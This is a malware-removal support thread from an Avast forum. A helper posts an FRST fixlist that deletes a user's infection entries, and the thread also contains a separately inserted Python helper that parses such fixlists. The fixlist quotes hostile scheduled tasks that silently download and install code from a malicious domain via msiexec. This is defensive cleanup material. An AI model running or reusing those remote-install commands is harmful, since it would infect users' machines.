Author Topic: Avast Blocked Connection (Read 2133 times)


REDACTED

Avast Blocked Connection
« on: October 15, 2018, 09:36:40 PM »
Hello, during normal use of my PC, even when I am not using any browser, a message appears saying:

Abortamos a conexão em reserved-18:09 com segurança, pois ela foi infectada com URL: Mal.

I have already followed the steps given by jefferson sant at: https://forum.avast.com/index.php?topic=222111.0

Accordingly, attached are the logs produced after running the FRST tool.

Thanks in advance!

REDACTED

Re: Avast Blocked Connection
« Reply #1 on: October 15, 2018, 10:13:19 PM »
Here is a screenshot of what happened.

Offline jefferson sant

Re: Avast Blocked Connection
« Reply #2 on: October 16, 2018, 04:14:14 AM »
Good evening PauloEduJr.

You will be referred to the malware removal specialist.
Please wait while he checks the logs and prepares the fix needed for your system.

Offline Sass Drake

Re: Avast Blocked Connection
« Reply #3 on: October 16, 2018, 09:20:00 PM »
  • Open Notepad (click Start button -> type notepad.exe -> press Enter)
  • Copy text from code block below and paste it into Notepad
Code:
Start

HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [OFX2MHJ73DG0V1P] => "C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [5NKCD3T568NOTBX] => "C:\Program Files (x86)\avdy4xd255s\IT2WO.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [TD06HHFP5CTIKRU] => "C:\Program Files\MARAE1CS4W\MARAE1CS4.exe"
AppInit_DLLs: C:\ProgramData\Kolnixo\Latdontex.dll => Nenhum Arquivo
AppInit_DLLs-x32: C:\ProgramData\Kolnixo\Unazoocore.dll => Nenhum Arquivo
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqRiJPeLR9xpZw-YCRDaqHUNFn4VvdPoH3kThd5Pb-DfTeDFWC3jmZ1uTs96rKYaW-FFJwcupTKq-GkE7JtUIUQmlM,
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3827494730-315343196-2291642818-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
FF ProfilePath: C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default [2018-10-08]
FF user.js: detected! => C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\user.js [2017-06-30]
FF Homepage: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.NT
FF Extension: (System Table) - C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\Extensions\383882@modext.tech.xpi [2018-08-22]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-09-17] <==== ATENÇÃO
CHR NewTab: Default ->  Not-active:"chrome-extension://pbdpajcdgknpendpmecafmopknefafha/index.html"
Task: {175C0283-03A8-4588-AE0A-D2A13688C342} - System32\Tasks\{D9CB0165-AADE-AFE6-309A-89FFBC6068FA} => C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
Task: {340341A9-02B5-4732-B1BE-E95FA8B555B5} - System32\Tasks\{977FC540-862A-1485-BE8E-EBE713CA2632} => "msiexec.exe" /i hxxp://reserved-1809.info/wqinlpdbtyiae.iim /q
Task: {ABA50C80-93BA-47D7-9B71-E787F5DAE34E} - System32\Tasks\{51429B8F-1957-2A2F-F8F9-19D260D02656} => C:\Program Files (x86)\EdEyamlne.exe <==== ATENÇÃO
Task: {DA8F3809-E003-4362-A9E6-336B51F17E3C} - System32\Tasks\{35F07B8B-E8E3-128A-9CD2-641985BE45E2} => "msiexec.exe" /q /i hxxp://reserved-1809.info/ieokzkigppaxj.avg
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
VirusTotal: C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe;C:\Program Files (x86)\avdy4xd255s\IT2WO.exe;C:\Program Files\MARAE1CS4W\MARAE1CS4.exe;C:\Windows\SysWOW64\yEiCoYMHMkAII.exe;
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
C:\Users\Larissa\AppData\Roaming\if1c3d5ltac
C:\Users\Larissa\AppData\Roaming\3a3uavskp25
C:\Program Files\Z2TPWW63HD
C:\Program Files (x86)\avdy4xd255s
C:\Program Files\MARAE1CS4W
C:\ProgramData\Kolnixo
C:\ProgramData\Kolnixos
C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
C:\Program Files (x86)\EdEyamlne.exe
2018-09-17 14:51 - 2018-09-17 14:51 - 007784960 _____ () C:\Users\Larissa\AppData\Local\agent.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000070896 _____ () C:\Users\Larissa\AppData\Local\Config.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 002020245 _____ () C:\Users\Larissa\AppData\Local\Dentodex.tst
2018-09-17 14:50 - 2018-09-17 14:50 - 000017664 _____ () C:\Users\Larissa\AppData\Local\InstallationConfiguration.xml
2018-09-17 14:50 - 2018-09-17 14:50 - 000140800 _____ () C:\Users\Larissa\AppData\Local\installer.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000018432 _____ () C:\Users\Larissa\AppData\Local\Main.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000005568 _____ () C:\Users\Larissa\AppData\Local\md.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 000126464 _____ () C:\Users\Larissa\AppData\Local\noah.dat
2018-09-17 14:50 - 2018-09-17 14:50 - 001413120 _____ () C:\Users\Larissa\AppData\Local\sham.db
2018-09-17 14:51 - 2018-09-17 14:51 - 000032038 _____ () C:\Users\Larissa\AppData\Local\uninstall_temp.ico
2018-09-17 14:51 - 2018-09-17 14:51 - 000000003 _____ () C:\Users\Larissa\AppData\Local\wbem.ini
EmptyTemp:

End
  • Go to File -> Save As
  • Make sure that UTF-8 is selected as Encoding (left side of the Save button)
  • Save it as fixlist.txt on the Desktop
  • Open FRST again and click on the Fix button
  • Wait until FRST finishes
  • fixlog.txt should be generated and opened. Attach it to your post and wait for further instructions.
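A small triage helper, added here as an example and not part of this post or of FRST itself: it classifies the directives of a fixlist in the shape of the one above (Run keys, AppInit_DLLs, browser settings, scheduled tasks, paths, commands) and percent-decodes the hostnames in the hijacked search and start-page entries, so a reader can see at a glance which domains the entries point to. The sample fixlist is constructed from the post's entry types, with the SID and the long query strings replaced by placeholders.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample in the shape of the fixlist above (SID and the long
# opaque query strings replaced by short placeholders).
SAMPLE_FIXLIST = r"""Start
HKU\S-1-5-21-0-0-0-1001\...\Run: [OFX2MHJ73DG0V1P] => "C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe"
AppInit_DLLs: C:\ProgramData\Kolnixo\Latdontex.dll => Nenhum Arquivo
HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=PLACEHOLDER&q={searchTerms}
Task: {340341A9-02B5-4732-B1BE-E95FA8B555B5} - System32\Tasks\{977FC540-862A-1485-BE8E-EBE713CA2632} => "msiexec.exe" /i hxxp://reserved-1809.info/wqinlpdbtyiae.iim /q
C:\ProgramData\Kolnixo
EmptyTemp:
End
"""

# Directive kinds in FRST fixlist syntax, matched in order (first hit wins).
KINDS = [
    ("task", re.compile(r"^Task:")),
    ("appinit", re.compile(r"^AppInit_DLLs")),
    ("run", re.compile(r"\\\.\.\.\\Run:")),
    ("browser", re.compile(r"^SearchScopes:|Internet Explorer\\Main,")),
    ("file", re.compile(r"^[A-Za-z]:\\")),
    ("command", re.compile(r"^\w+:$")),
]
URL_RE = re.compile(r"hxxps?://\S+")

def decoded_hosts(line):
    """Hostnames of every defanged (hxxp) URL on the line, percent-decoded,
    since the hijacker writes the whole host as %XX escapes (%66%65%65%64 = feed)."""
    hosts = []
    for url in URL_RE.findall(line):
        real = "http" + url[4:]  # refang: hxxp -> http, hxxps -> https
        host = urlsplit(unquote(real)).hostname
        if host:
            hosts.append(host)
    return hosts

def parse_fixlist(text):
    """Classify each directive between Start and End; unknown lines get kind 'other'."""
    entries = []
    active = False
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "Start":
            active = True
        elif line == "End":
            break
        elif active and line:
            kind = next((k for k, rx in KINDS if rx.search(line)), "other")
            entries.append({"kind": kind, "hosts": decoded_hosts(line), "line": line})
    return entries
```

Running `parse_fixlist(SAMPLE_FIXLIST)` on the sample yields six entries, with `feed.sonic-search.com` recovered from the encoded Search Page entry and `reserved-1809.info` from the msiexec task.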

REDACTED

Re: Avast Blocked Connection
« Reply #4 on: October 17, 2018, 01:28:17 PM »
Here is the fixlog.

Offline jefferson sant

Re: Avast Blocked Connection
« Reply #5 on: October 19, 2018, 04:19:28 AM »
Here is the fixlog.

I forwarded it to Sass Drake. The log will be checked tomorrow.
« Last Edit: October 19, 2018, 04:22:53 AM by jefferson sant »

Offline Sass Drake

Re: Avast Blocked Connection
« Reply #6 on: October 19, 2018, 08:50:48 PM »
What is the system status now?